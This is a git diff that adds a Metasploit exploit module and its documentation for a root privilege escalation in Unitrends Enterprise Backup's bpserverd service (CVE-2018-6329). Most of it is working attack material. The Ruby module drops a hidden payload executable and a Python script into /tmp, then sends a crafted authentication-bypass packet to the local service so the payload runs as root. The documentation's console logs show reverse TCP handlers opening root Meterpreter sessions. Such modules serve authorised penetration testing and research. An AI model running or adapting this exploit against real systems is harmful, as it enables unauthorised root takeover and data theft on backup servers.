diff --git a/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb b/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb new file mode 100644 index 0000000000..f20c23f786 --- /dev/null +++ b/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb @@ -0,0 +1,95 @@ +## Vulnerable Application + +It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`, +has an issue in which its authentication can be bypassed. A remote attacker could use this +issue to execute arbitrary commands with root privilege on the target system. +This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the +`localhost` by dropping a python script on the local file system. Unitrends stopped +`bpserverd` from listening remotely on version 10. + +## Vulnerable Application + +This module has been tested successfully on: + * UEB 9.2 + * UEB 10.0 + +## Verification Steps + + 1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1` + 2. ```use exploit/linux/local/ueb_bpserverd_privesc ``` + 3. ```set session [SESSION]``` + 4. ```exploit``` + 5. A root meterpreter session should have been opened successfully + +## Scenarios + +### UEB 10.0 on CentOS 6.5 + +``` +msf > use exploit/linux/local/ueb_priv_esc +msf exploit(linux/local/ueb_priv_esc) > set session 4 +session => 4 +msf exploit(linux/local/ueb_priv_esc) > exploit + +[*] Started reverse TCP handler on 15.0.0.177:4444 +[*] Writing payload executable to '/tmp/pEFoythF' +[*] Writing privesc script to '/tmp/CTZSovJR' +[*] Fixing permissions +[*] Sending stage (857352 bytes) to 10.20.1.202 +[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400 +[+] Deleted /tmp/pEFoythF +[+] Deleted /tmp/CTZSovJR + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +### UEB 9.2 on CentOS 6 + +``` +resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce +resource (ueb_priv.rb)> set rhost 1.1.1.1 +rhost => 1.1.1.1 +resource (ueb_priv.rb)> set lhost 2.2.2.2 +lhost => 2.2.2.2 +resource (ueb_priv.rb)> set target 1 +target => 1 +resource (ueb_priv.rb)> run +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] 1.1.1.1:443 - Sending requests to UEB... +[*] Command Stager progress - 19.76% done (164/830 bytes) +[*] Command Stager progress - 39.16% done (325/830 bytes) +[*] Command Stager progress - 56.87% done (472/830 bytes) +[*] Command Stager progress - 74.82% done (621/830 bytes) +[*] Command Stager progress - 92.77% done (770/830 bytes) +[*] Command Stager progress - 110.48% done (917/830 bytes) +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500 +[*] Command Stager progress - 126.63% done (1051/830 bytes) + +meterpreter > getuid +Server username: uid=48, gid=48, euid=48, egid=48 +meterpreter > sysinfo +Computer : 1.1.1.1 +OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64) +Architecture : x64 +BuildTuple : i486-linux-musl +Meterpreter : x86/linux +meterpreter > background +[*] Backgrounding session 1... +resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc +resource (ueb_priv.rb)> set session 1 +session => 1 +resource (ueb_priv.rb)> run + +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Writing payload executable to '/tmp/.mM0iyQvoAO' +[*] Writing privesc script to '/tmp/.sDjn0m' +[*] Fixing permissions +[*] Sending stage (861480 bytes) to 1.1.1.1 +[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500 + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + diff --git a/modules/exploits/linux/local/ueb_bpserverd_privesc.rb b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb new file mode 100644 index 0000000000..07c7b007c1 --- /dev/null +++ b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Unitrends Enterprise Backup bpserverd Privilege Escalation', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system. + This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the + localhost by dropping a python script on the local file system. Unitrends stopped + bpserverd from listening remotely on version 10. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Cale Smith', # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave', # @iotennui + 'h00die' # msf adaptations + ], + 'DisclosureDate' => 'Mar 14 2018', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'], + ['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'], + ['EDB', '44297'], + ['CVE', '2018-6329'] + ], + 'Targets' => + [ + [ 'UEB <= 10.0', { } ] + ], + 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 }, + 'SessionTypes' => ['shell', 'meterpreter'], + 'DefaultTarget' => 0 + } + )) + register_advanced_options([ + OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]), + OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743]) + ]) + end + + def exploit + + pl = generate_payload_exe + exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}" + print_status("Writing payload executable to '#{exe_path}'") + + write_file(exe_path, pl) + #register_file_for_cleanup(exe_path) + +pe_script = %Q{ +import socket +import binascii +import struct +import time +import sys + +RHOST = '127.0.0.1' +XINETDPORT = #{datastore['BPSERVERDPORT']} +cmd = "#{exe_path}" + +def recv_timeout(the_socket,timeout=2): + the_socket.setblocking(0) + total_data=[];data='';begin=time.time() + while 1: + #if you got some data, then break after wait sec + if total_data and time.time()-begin>timeout: + break + #if you got no data at all, wait a little longer + elif time.time()-begin>timeout*2: + break + try: + data=the_socket.recv(8192) + if data: + total_data.append(data) + begin=time.time() + else: + time.sleep(0.1) + except: + pass + return ''.join(total_data) + +print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT)) + +try: + s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s1.connect((RHOST,XINETDPORT)) +except: + print "[!] Failed to connect!" + exit() + +data = s1.recv(4096) +bpd_port = int(data[-8:-3]) + +try: + pass + s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s2.connect((RHOST, bpd_port)) +except: + print "[!] Failed to connect!" + s1.close() + exit() + +print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) +print "[+] '{0}'".format(cmd) + +cmd_len = chr(len(cmd) + 3) +packet_len = chr(len(cmd) + 23) + +#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72 +packet = '\\xa5\\x52\\x00\\x2d' +packet += '\\x00' * 3 +packet += packet_len +packet += '\\x00' * 3 +packet += '\\x01' +packet += '\\x00' * 3 +packet += '\\x4c' +packet += '\\x00' * 3 +packet += cmd_len +packet += cmd +packet += '\\x00' * 3 + +s1.send(packet) + +data = recv_timeout(s2) + +print data + +s1.close() +} + + pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}" + print_status("Writing privesc script to '#{pes_path}'") + + write_file(pes_path, pe_script) + #register_file_for_cleanup(pes_path) + + print_status("Fixing permissions") + cmd_exec("chmod +x #{exe_path} #{pes_path}") + + vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'") + end + +end +